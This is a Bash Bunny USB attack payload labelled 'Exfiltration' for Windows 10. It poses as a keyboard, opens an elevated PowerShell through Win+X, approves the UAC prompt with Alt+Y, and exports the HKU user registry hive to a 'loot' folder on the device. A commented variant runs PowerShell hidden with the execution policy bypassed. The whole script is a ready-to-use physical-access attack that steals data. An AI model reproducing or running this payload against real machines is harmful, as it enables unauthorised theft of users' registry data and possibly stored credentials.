# Title:       	Backup User registry (HKU)
# Description:  Uses PowerShell, to run Reg.exe to export the HKU entry to a file on the bunny  
# Author:       Cribbit
# Version:      1.1
# Category:     Exfiltration
# Target:       Windows 10 (Creators Update) (Powershell)
# Attackmodes:	HID & STORAGE	
# Config: 	Usesful root keys [ HKLM | HKCU | HKCR | HKU | HKCC ]

LED SETUP
ATTACKMODE HID STORAGE

LED ATTACK
Q DELAY 200
REM RUN WIN powershell -NoP -NonI -W Hidden -Exec Bypass ".(Reg EXPORT HKU ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\keys.reg'))"
Q GUI x
Q STRING a
Q DELAY 100
Q ALT y
Q DELAY 100
Q STRING "Reg EXPORT HKU ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\keys.reg') /y"
Q ENTER 
LED FINISH
